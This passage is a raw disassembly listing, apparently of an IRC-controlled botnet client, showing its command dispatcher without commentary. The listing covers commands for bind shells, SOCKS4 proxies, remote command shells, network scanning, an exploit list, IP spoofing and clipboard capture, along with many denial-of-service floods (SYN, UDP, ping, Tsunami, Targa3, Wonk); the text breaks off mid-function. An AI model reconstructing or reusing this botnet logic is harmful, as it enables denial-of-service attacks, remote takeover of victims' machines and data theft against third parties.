mov eax, [ebp+var_8]
mov [ebp+var_2908], eax
lea eax, [ebp+var_C4]
push eax
lea eax, [ebp+Dst]
push offset asc_42CB90 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 1Bh ; int
push eax ; Source
call sub_40B3BA
add esp, 18h
mov [ebp+var_2910], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_2AB4]
push ebx
push eax
push offset sub_416000
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_2910]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_402508
loc_4024F2: ; CODE XREF: sub_401ACD+A39�j
cmp [ebp+var_2904], ebx
jnz loc_4082DE
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_4024F2
; ---------------------------------------------------------------------------
loc_402508: ; CODE XREF: sub_401ACD+A23�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42CB58
jmp loc_4082CF
; ---------------------------------------------------------------------------
loc_402519: ; CODE XREF: sub_401ACD+966�j
lea eax, [ebp+var_C4]
push eax
push offset unk_42CB28
jmp loc_4082CF
; ---------------------------------------------------------------------------
loc_40252A: ; CODE XREF: sub_401ACD+956�j
lea eax, [ebp+var_C4]
push eax
push offset unk_42CAF4
jmp loc_4082CF
; ---------------------------------------------------------------------------
loc_40253B: ; CODE XREF: sub_401ACD+6B6�j
mov eax, [ebp+arg_8]
lea ecx, [eax+1]
mov al, [eax]
cmp al, byte_429094
mov [edi], ecx
jnz loc_401F75
loc_402551: ; CODE XREF: sub_401ACD+94A�j
mov edi, [edi]
push edi ; Str2
push offset aC ; "c"
mov [ebp+arg_8], edi
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40964C
push edi ; Str2
push offset aK ; "k"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40964C
cmp [ebp+var_A4], ebx
jnz short loc_4025A2
push dword ptr [ebp+Args] ; Str2
push offset a332 ; "332"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_409644
loc_4025A2: ; CODE XREF: sub_401ACD+AB9�j
cmp [ebp+arg_28], ebx
jnz loc_409644
xor edi, edi
cmp dword_4294CC, ebx
jle loc_402757
mov [ebp+arg_20], offset dword_43DB90
loc_4025C0: ; CODE XREF: sub_401ACD+B12�j
push [ebp+arg_8] ; Str2
push [ebp+arg_20] ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_4025E6
add [ebp+arg_20], 0B8h
inc edi
cmp edi, dword_4294CC
jl short loc_4025C0
jmp loc_402757
; ---------------------------------------------------------------------------
loc_4025E6: ; CODE XREF: sub_401ACD+B02�j
push offset SubStr ; " :"
push [ebp+Src] ; Str
call _strstr
pop ecx
cmp eax, ebx
pop ecx
jz loc_401F75
mov cl, byte_429094
imul edi, 0B8h
mov [eax+2], cl
mov cl, byte_429094
mov [eax+3], cl
lea ecx, dword_43DBA8[edi]
push 9Fh ; Count
add eax, 4
push ecx ; Source
push eax ; Dest
call _strncpy
lea eax, [ebp+esi+var_50]
add esp, 0Ch
mov [ebp+arg_20], 0Fh
mov [ebp+arg_C], eax
loc_40263B: ; CODE XREF: sub_401ACD+C1F�j
push [ebp+arg_20]
lea eax, [ebp+SubStr]
push offset aD ; "$%d-"
push eax ; Dest
call _sprintf
lea eax, [ebp+SubStr]
push eax ; SubStr
push [ebp+Src] ; Str
call _strstr
add esp, 14h
test eax, eax
jz short loc_4026A7
mov eax, [ebp+arg_C]
cmp [eax], ebx
jz short loc_4026A7
lea eax, dword_43DB90[edi]
push eax ; Str
call _strlen
add [ebp+var_C], eax
pop ecx
jz short loc_4026E2
mov eax, [ebp+arg_C]
push dword ptr [eax-4] ; SubStr
push [ebp+var_C] ; Str
call _strstr
pop ecx
cmp eax, ebx
pop ecx
jz short loc_4026E2
push eax ; Source
lea eax, [ebp+SubStr]
push eax ; SubStr
push [ebp+Src] ; Src
call sub_41843B
add esp, 0Ch
jmp short loc_4026E2
; ---------------------------------------------------------------------------
loc_4026A7: ; CODE XREF: sub_401ACD+B96�j
; sub_401ACD+B9D�j
mov eax, [ebp+arg_C]
cmp [eax], ebx
jnz short loc_4026E2
lea eax, [ebp+SubStr]
push 2 ; Count
push eax ; Source
lea eax, [ebp+var_94]
push eax ; Dest
call _strncpy
lea eax, [ebp+var_94]
mov [ebp+var_92], bl
push eax ; Source
lea eax, [ebp+SubStr]
push eax ; SubStr
push [ebp+Src] ; Src
call sub_41843B
add esp, 18h
loc_4026E2: ; CODE XREF: sub_401ACD+BAF�j
; sub_401ACD+BC3�j ...
dec [ebp+arg_20]
sub [ebp+arg_C], 4
cmp [ebp+arg_20], ebx
jg loc_40263B
lea eax, [ebp+esi+var_50]
mov [ebp+arg_20], 10h
mov edi, eax
loc_4026FF: ; CODE XREF: sub_401ACD+C7E�j
push [ebp+arg_20]
lea eax, [ebp+SubStr]
push offset aD_0 ; "$%d"
push eax ; Dest
call _sprintf
lea eax, [ebp+SubStr]
push eax ; SubStr
push [ebp+Src] ; Str
call _strstr
add esp, 14h
test eax, eax
jz short loc_402742
mov eax, [edi]
cmp eax, ebx
jz short loc_402742
push eax ; Source
lea eax, [ebp+SubStr]
push eax ; SubStr
push [ebp+Src] ; Src
call sub_41843B
add esp, 0Ch
loc_402742: ; CODE XREF: sub_401ACD+C5A�j
; sub_401ACD+C60�j
dec [ebp+arg_20]
sub edi, 4
cmp [ebp+arg_20], ebx
jg short loc_4026FF
mov [ebp+var_2C8], 1
loc_402757: ; CODE XREF: sub_401ACD+AE6�j
; sub_401ACD+B14�j
mov eax, [ebp+arg_8]
mov al, [eax]
cmp al, byte_429094
jz short loc_402770
cmp [ebp+var_2C8], ebx
jz loc_402961
loc_402770: ; CODE XREF: sub_401ACD+C95�j
push [ebp+Source] ; Source
mov edi, [ebp+Src]
push offset aMe ; "$me"
push edi ; Src
call sub_41843B
lea eax, [ebp+var_C4]
push eax ; Source
push offset aUser ; "$user"
push edi ; Src
call sub_41843B
push [ebp+Format] ; Source
push offset aChan ; "$chan"
push edi ; Src
call sub_41843B
push ebx ; Str1
push ebx ; int
lea eax, [ebp+SubStr]
push 2 ; int
push eax ; Dest
call sub_40AE84
push eax ; Source
push offset aRndnick ; "$rndnick"
push edi ; Src
call sub_41843B
add esp, 40h
push [ebp+arg_14] ; Source
push offset aServer ; "$server"
push edi ; Src
call sub_41843B
mov edi, offset aChr ; "$chr("
push edi ; SubStr
push [ebp+Src] ; Str
call _strstr
add esp, 14h
loc_4027E2: ; CODE XREF: sub_401ACD+E0D�j
test eax, eax
jz loc_4028DF
push edi ; SubStr
push [ebp+Src] ; Str
call _strstr
mov [ebp+Source], eax
add eax, 5
push 4 ; Count
push eax ; Source
lea eax, [ebp+SubStr]
push eax ; Dest
call _strncpy
lea eax, [ebp+SubStr]
push offset asc_42CAAC ; ")"
push eax ; Str
call _strtok
add esp, 1Ch
cmp [ebp+SubStr], 30h
jl short loc_40282E
cmp [ebp+SubStr], 39h
jle short loc_402844
loc_40282E: ; CODE XREF: sub_401ACD+D56�j
push 3 ; Count
lea eax, [ebp+SubStr]
push offset a63 ; "63"
push eax ; Dest
call _strncpy
add esp, 0Ch
loc_402844: ; CODE XREF: sub_401ACD+D5F�j
lea eax, [ebp+SubStr]
push eax ; Str
call _atoi
test eax, eax
pop ecx
jle short loc_40286A
lea eax, [ebp+SubStr]
push eax ; Str
call _atoi
pop ecx
mov [ebp+var_94], al
jmp short loc_40287E
; ---------------------------------------------------------------------------
loc_40286A: ; CODE XREF: sub_401ACD+D86�j
call _rand
push 60h
cdq
pop ecx
idiv ecx
add dl, 20h
mov [ebp+var_94], dl
loc_40287E: ; CODE XREF: sub_401ACD+D9B�j
lea eax, [ebp+SubStr]
mov [ebp+var_93], bl
push eax ; Str
call _strlen
mov [ebp+arg_20], eax
push 0Ch ; Size
lea eax, [ebp+SubStr]
push ebx ; Val
push eax ; Dst
call _memset
mov eax, [ebp+arg_20]
add eax, 6
push eax ; Count
lea eax, [ebp+SubStr]
push [ebp+Source] ; Source
push eax ; Dest
call _strncpy
lea eax, [ebp+var_94]
push eax ; Source
lea eax, [ebp+SubStr]
push eax ; SubStr
push [ebp+Src] ; Src
call sub_41843B
push edi ; SubStr
push [ebp+Src] ; Str
call _strstr
add esp, 30h
jmp loc_4027E2
; ---------------------------------------------------------------------------
loc_4028DF: ; CODE XREF: sub_401ACD+D17�j
mov edi, 1FFh
lea eax, [ebp+Str]
push edi ; Count
push [ebp+Src] ; Source
push eax ; Dest
call _strncpy
lea eax, [ebp+Str]
push edi ; Count
push eax ; Source
lea eax, [ebp+var_4EF8]
push eax ; Dest
call _strncpy
lea eax, [ebp+var_4EF8]
push offset asc_42CDC0 ; " "
push eax ; Str
call _strtok
add esp, 20h
mov [ebp+var_90], eax
lea edi, [ebp+Args]
mov [ebp+Source], 1Fh
loc_40292F: ; CODE XREF: sub_401ACD+E77�j
push offset asc_42CDC0 ; " "
push ebx ; Str
call _strtok
mov [edi], eax
pop ecx
add edi, 4
dec [ebp+Source]
pop ecx
jnz short loc_40292F
mov ecx, [ebp+esi+var_90]
lea eax, [ebp+esi+var_90]
cmp ecx, ebx
jz loc_401F75
add ecx, 3
mov [eax], ecx
loc_402961: ; CODE XREF: sub_401ACD+C9D�j
mov edi, [ebp+esi+var_90]
push edi ; Str2
push offset aRndnick_0 ; "rndnick"
mov [ebp+arg_8], edi
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4095F2
push edi ; Str2
push offset aRn ; "rn"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4095F2
push edi ; Str2
push offset aDi3 ; "di3"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4049B3
push edi ; Str2
push offset aDi3 ; "di3"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4049B3
push edi ; Str2
push offset aLogout ; "logout"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404911
push edi ; Str2
push offset aLo ; "lo"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404911
push edi ; Str2
push offset aVersion ; "version"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404902
push edi ; Str2
push offset aVer ; "ver"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404902
push edi ; Str2
push offset aRulez ; "rulez"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4048F8
push edi ; Str2
push offset aRz ; "rz"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4048F8
push edi ; Str2
push offset aSpeedtest ; "speedtest"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4048DF
push edi ; Str2
push offset aSt ; "st"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4048DF
push edi ; Str2
push offset aSecure ; "secure"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4047E1
push edi ; Str2
push offset aSec ; "sec"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4047E1
push edi ; Str2
push offset aUnsecure ; "unsecure"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4047E1
push edi ; Str2
push offset aUnsec ; "unsec"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4047E1
push edi ; Str2
push offset aBindshell ; "bindshell"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4046DB
push edi ; Str2
push offset aBd ; "bd"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4046DB
push edi ; Str2
push offset aBindshellstop ; "bindshellstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_402B0E
push dword ptr [ebp+esi+Args]
push 6
push offset aServer_0 ; "Server"
push offset dword_42CA08
jmp loc_408D08
; ---------------------------------------------------------------------------
loc_402B0E: ; CODE XREF: sub_401ACD+1027�j
push edi ; Str2
push offset aSocks4 ; "socks4"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4045B9
push edi ; Str2
push offset aS4 ; "s4"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4045B9
push edi ; Str2
push offset aSocks4stop ; "socks4stop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_402B61
push dword ptr [ebp+esi+Args]
push 19h
push offset aServer_0 ; "Server"
push offset dword_42C9E0
jmp loc_408D08
; ---------------------------------------------------------------------------
loc_402B61: ; CODE XREF: sub_401ACD+107A�j
push edi ; Str2
push offset aRloginstop ; "rloginstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_402B8A
push dword ptr [ebp+esi+Args]
push 9
push offset aServer_0 ; "Server"
push offset dword_42C9C4
jmp loc_408D08
; ---------------------------------------------------------------------------
loc_402B8A: ; CODE XREF: sub_401ACD+10A3�j
push edi ; Str2
push offset aHttpstop ; "httpstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_402BB3
push dword ptr [ebp+esi+Args]
push 3
push offset aServer_0 ; "Server"
push offset dword_42C9A8
jmp loc_408D08
; ---------------------------------------------------------------------------
loc_402BB3: ; CODE XREF: sub_401ACD+10CC�j
push edi ; Str2
push offset aLogstop ; "logstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_402BDC
push dword ptr [ebp+esi+Args]
push 25h
push offset aLogList ; "Log list"
push offset dword_42C988
jmp loc_408D08
; ---------------------------------------------------------------------------
loc_402BDC: ; CODE XREF: sub_401ACD+10F5�j
push edi ; Str2
push offset aRedirectstop ; "redirectstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_402C05
push dword ptr [ebp+esi+Args]
push 18h
push offset aTcpRedirect ; "TCP redirect"
push offset dword_42C958
jmp loc_408D08
; ---------------------------------------------------------------------------
loc_402C05: ; CODE XREF: sub_401ACD+111E�j
push edi ; Str2
push offset aDdos_stop ; "ddos.stop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_402C2E
push dword ptr [ebp+esi+Args]
push 0Dh
push offset aDdosFlood ; "DDoS flood"
push offset dword_42C934
jmp loc_408D08
; ---------------------------------------------------------------------------
loc_402C2E: ; CODE XREF: sub_401ACD+1147�j
push edi ; Str2
push offset aSynstop ; "synstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_402C57
push dword ptr [ebp+esi+Args]
push 0Eh
push offset aSynFlood ; "Syn flood"
push offset dword_42C914
jmp loc_408D08
; ---------------------------------------------------------------------------
loc_402C57: ; CODE XREF: sub_401ACD+1170�j
push edi ; Str2
push offset aSkysynstop ; "skysynstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_402C80
push dword ptr [ebp+esi+Args]
push 10h
push offset aSkysynFlood ; "SkySyn flood"
push offset dword_42C8E8
jmp loc_408D08
; ---------------------------------------------------------------------------
loc_402C80: ; CODE XREF: sub_401ACD+1199�j
push edi ; Str2
push offset aTarga3stop ; "targa3stop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_402CA9
push dword ptr [ebp+esi+Args]
push 11h
push offset aTarga3Flood ; "Targa3 flood"
push offset dword_42C8BC
jmp loc_408D08
; ---------------------------------------------------------------------------
loc_402CA9: ; CODE XREF: sub_401ACD+11C2�j
push edi ; Str2
push offset aWonkstop ; "wonkstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_402CD2
push dword ptr [ebp+esi+Args]
push 12h
push offset aWonkFlood ; "Wonk flood"
push offset dword_42C898
jmp loc_408D08
; ---------------------------------------------------------------------------
loc_402CD2: ; CODE XREF: sub_401ACD+11EB�j
push edi ; Str2
push offset aPacketstop ; "packetstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_402E28
mov esi, dword ptr [ebp+esi+Args]
mov edi, [ebp+arg_4]
push esi ; Str
push 0Dh ; int
push offset aDdosFlood ; "DDoS flood"
push offset dword_42C934 ; int
push 1 ; int
push [ebp+var_4] ; int
push [ebp+Format] ; int
push edi ; int
call sub_40B648
push esi ; Str
push 0Eh ; int
push offset aSynFlood ; "Syn flood"
push offset dword_42C914 ; int
push 1 ; int
push [ebp+var_4] ; int
push [ebp+Format] ; int
push edi ; int
call sub_40B648
add esp, 40h
push esi ; Str
push 17h ; int
push offset aUdpFlood ; "UDP flood"
push offset dword_42C874 ; int
push 1 ; int
push [ebp+var_4] ; int
push [ebp+Format] ; int
push edi ; int
call sub_40B648
push esi ; Str
push 16h ; int
push offset aPingFlood ; "Ping flood"
push offset dword_42C85C ; int
push 1 ; int
push [ebp+var_4] ; int
push [ebp+Format] ; int
push edi ; int
call sub_40B648
add esp, 40h
push esi ; Str
push 11h ; int
push offset aTarga3Flood ; "Targa3 flood"
push offset dword_42C8BC ; int
push 1 ; int
push [ebp+var_4] ; int
push [ebp+Format] ; int
push edi ; int
call sub_40B648
push esi ; Str
push 12h ; int
push offset aWonkFlood ; "Wonk flood"
push offset dword_42C898 ; int
push 1 ; int
push [ebp+var_4] ; int
push [ebp+Format] ; int
push edi ; int
call sub_40B648
add esp, 40h
push esi ; Str
push 0Fh ; int
push offset aTsunamiFlood ; "Tsunami flood"
push offset dword_42C83C ; int
push 1 ; int
push [ebp+var_4] ; int
push [ebp+Format] ; int
push edi ; int
call sub_40B648
push esi ; Str
push 13h ; int
push offset aWisdomAttack ; "Wisdom attack"
push offset dword_42C81C ; int
push 1 ; int
push [ebp+var_4] ; int
push [ebp+Format] ; int
push edi ; int
call sub_40B648
add esp, 40h
push esi ; Str
push 10h ; int
push offset aSkysynFlood ; "SkySyn flood"
push offset dword_42C8E8 ; int
push 1 ; int
push [ebp+var_4] ; int
push [ebp+Format] ; int
push edi ; int
call sub_40B648
push ebx ; int
push [ebp+var_4] ; int
push offset unk_42C7E8 ; int
push [ebp+Format] ; Str
push edi ; int
call sub_409869
add esp, 34h
jmp loc_401F75
; ---------------------------------------------------------------------------
loc_402E28: ; CODE XREF: sub_401ACD+1214�j
push edi ; Str2
push offset aTsunamistop ; "tsunamistop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_402E51
push dword ptr [ebp+esi+Args]
push 0Fh
push offset aTsunamiFlood ; "Tsunami flood"
push offset dword_42C83C
jmp loc_408D08
; ---------------------------------------------------------------------------
loc_402E51: ; CODE XREF: sub_401ACD+136A�j
push edi ; Str2
push offset aWisdomstop ; "wisdomstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_402E7A
push dword ptr [ebp+esi+Args]
push 13h
push offset aWisdomAttack ; "Wisdom attack"
push offset dword_42C81C
jmp loc_408D08
; ---------------------------------------------------------------------------
loc_402E7A: ; CODE XREF: sub_401ACD+1393�j
push edi ; Str2
push offset aUdpstop ; "udpstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_402EA3
push dword ptr [ebp+esi+Args]
push 17h
push offset aUdpFlood ; "UDP flood"
push offset dword_42C874
jmp loc_408D08
; ---------------------------------------------------------------------------
loc_402EA3: ; CODE XREF: sub_401ACD+13BC�j
push edi ; Str2
push offset aPingstop ; "pingstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_402ECC
push dword ptr [ebp+esi+Args]
push 16h
push offset aPingFlood ; "Ping flood"
push offset dword_42C85C
jmp loc_408D08
; ---------------------------------------------------------------------------
loc_402ECC: ; CODE XREF: sub_401ACD+13E5�j
push edi ; Str2
push offset aTftpstop ; "tftpstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_402EF5
push dword ptr [ebp+esi+Args]
push 5
push offset aServer_0 ; "Server"
push offset dword_42C7A0
jmp loc_408D08
; ---------------------------------------------------------------------------
loc_402EF5: ; CODE XREF: sub_401ACD+140E�j
push edi ; Str2
push offset aFindfilestop ; "findfilestop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4045A1
push edi ; Str2
push offset aFfstop ; "ffstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4045A1
push edi ; Str2
push offset aProcsstop ; "procsstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404589
push edi ; Str2
push offset aPsstop ; "psstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404589
push edi ; Str2
push offset aClonestop ; "clonestop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_402F72
push dword ptr [ebp+esi+Args]
push 1Fh
push offset aClone ; "Clone"
push offset dword_42C750
jmp loc_408D08
; ---------------------------------------------------------------------------
loc_402F72: ; CODE XREF: sub_401ACD+148B�j
push edi ; Str2
push offset aSecurestop ; "securestop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_402F9B
push dword ptr [ebp+esi+Args]
push 22h
push offset aSecure_0 ; "Secure"
push offset dword_42C72C
jmp loc_408D08
; ---------------------------------------------------------------------------
loc_402F9B: ; CODE XREF: sub_401ACD+14B4�j
push edi ; Str2
push offset aScanstop ; "scanstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_402FC4
push dword ptr [ebp+esi+Args]
push 0Bh
push offset aScan ; "Scan"
push offset dword_42C70C
jmp loc_408D08
; ---------------------------------------------------------------------------
loc_402FC4: ; CODE XREF: sub_401ACD+14DD�j
push edi ; Str2
push offset aScanstats ; "scanstats"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404573
push edi ; Str2
push offset aStats ; "stats"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404573
push edi ; Str2
push offset aTransferstats ; "transferstats"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40455D
push edi ; Str2
push offset aTrstats ; "trstats"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40455D
push edi ; Str2
push offset aConnectbacksta ; "connectbackstats"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404547
push edi ; Str2
push offset aCbstats ; "cbstats"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404547
push edi ; Str2
push offset aExploitlist ; "exploitlist"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404531
push edi ; Str2
push offset aExplist ; "explist"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404531
push edi ; Str2
push offset aReconnect ; "reconnect"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404512
push edi ; Str2
push offset aR ; "r"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404512
push edi ; Str2
push offset aDisconnect ; "disconnect"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4044F0
push edi ; Str2
push offset aDc ; "dc"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4044F0
push edi ; Str2
push offset aQuit_0 ; "quit"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4044A8
push edi ; Str2
push offset aQ ; "q"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4044A8
push edi ; Str2
push offset aStatus ; "status"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404494
push edi ; Str2
push offset aS_5 ; "s"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404494
push edi ; Str2
push offset aId ; "id"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40445D
push edi ; Str2
push offset aI ; "i"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40445D
push edi ; Str2
push offset aR3start ; "r3start"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_403190
call sub_418884
test eax, eax
mov eax, offset unk_42C64C
jnz short loc_403162
mov eax, offset unk_42C628
loc_403162: ; CODE XREF: sub_401ACD+168E�j
push eax ; Format
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409869
add esp, 1Ch
jmp loc_4082DE
; ---------------------------------------------------------------------------
loc_403190: ; CODE XREF: sub_401ACD+1680�j
push edi ; Str2
push offset aThreads ; "threads"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40437E
push edi ; Str2
push offset aT ; "t"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40437E
push edi ; Str2
push offset aAliases ; "aliases"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40435B
push edi ; Str2
push offset aAl ; "al"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40435B
push edi ; Str2
push offset aLog ; "log"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404268
push edi ; Str2
push offset aLg ; "lg"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404268
push edi ; Str2
push offset aClearlog ; "clearlog"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40424C
push edi ; Str2
push offset aClg ; "clg"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40424C
push edi ; Str2
push offset aNetinfo ; "netinfo"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404212
push edi ; Str2
push offset aNi ; "ni"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404212
push edi ; Str2
push offset aSysinfo ; "sysinfo"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4041E7
push edi ; Str2
push offset aSi ; "si"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4041E7
push edi ; Str2
push offset aKosomaky4d ; "KOSOMAKY4D"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4041AD
push edi ; Str2
push offset aKosomaky4d ; "KOSOMAKY4D"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4041AD
push edi ; Str2
push offset aProcs ; "procs"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40408D
push edi ; Str2
push offset aPs ; "ps"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40408D
push edi ; Str2
push offset aUptime ; "uptime"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404005
push edi ; Str2
push offset aUp ; "up"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404005
push edi ; Str2
push offset aDriveinfo ; "driveinfo"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_403FE8
push edi ; Str2
push offset aDrv ; "drv"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_403FE8
push edi ; Str2
push offset aTestdlls ; "testdlls"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_403FCF
push edi ; Str2
push offset aDll ; "dll"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_403FCF
push edi ; Str2
push offset aOpencmd ; "opencmd"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_403F5B
push edi ; Str2
push offset aOcmd ; "ocmd"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_403F5B
push edi ; Str2
push offset aCmdstop ; "cmdstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4033B1
push dword ptr [ebp+esi+Args]
push 0Ah
push offset aRemoteShell ; "Remote shell"
push offset dword_42C568
jmp loc_408D08
; ---------------------------------------------------------------------------
loc_4033B1: ; CODE XREF: sub_401ACD+18CA�j
push edi ; Str2
push offset aWho ; "who"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_4034C7
cmp [ebp+var_8], ebx
jnz short loc_4033E5
push ebx ; int
push [ebp+var_4] ; int
push offset dword_42C550 ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409869
add esp, 14h
loc_4033E5: ; CODE XREF: sub_401ACD+18FC�j
mov eax, [ebp+arg_18]
xor edi, edi
mov [ebp+arg_18], eax
jmp short loc_4033F2
; ---------------------------------------------------------------------------
loc_4033EF: ; CODE XREF: sub_401ACD+196C�j
mov eax, [ebp+arg_18]
loc_4033F2: ; CODE XREF: sub_401ACD+1920�j
cmp [eax], bl
jz short loc_4033F9
inc eax
jmp short loc_4033FE
; ---------------------------------------------------------------------------
loc_4033F9: ; CODE XREF: sub_401ACD+1927�j
mov eax, offset aEmpty ; "<Empty>"
loc_4033FE: ; CODE XREF: sub_401ACD+192A�j
push eax
push edi
lea eax, [ebp+Dst]
push offset aD_S ; "%d. %s"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409869
add [ebp+arg_18], 80h
add esp, 24h
inc edi
cmp edi, 3
jl short loc_4033EF
push offset unk_42C520
call sub_415D38
pop ecx
loc_403446: ; CODE XREF: sub_401ACD+1BFD�j
; sub_401ACD+2EFA�j
mov edi, dword ptr [ebp+esi+Args]
cmp edi, ebx
mov [ebp+arg_20], edi
jz loc_401F75
push [ebp+arg_8] ; Str2
push offset aSpoof ; "spoof"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_404AAB
push offset Str2 ; "off"
push edi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_4049D9
lea eax, [ebp+Dst]
push offset asc_42C4EC ; "-"
push eax ; Dest
mov dword_4CF180, ebx
call _sprintf
pop ecx
pop ecx
loc_40349D: ; CODE XREF: sub_401ACD+2FD9�j
cmp [ebp+var_8], ebx
jnz loc_409644
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409869
loc_4034BF: ; CODE XREF: sub_401ACD+7032�j
add esp, 14h
jmp loc_409644
; ---------------------------------------------------------------------------
loc_4034C7: ; CODE XREF: sub_401ACD+18F3�j
push edi ; Str2
push offset aGetclip ; "getclip"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_403F1A
push edi ; Str2
push offset aGc ; "gc"
call _strcmp
pop ecx
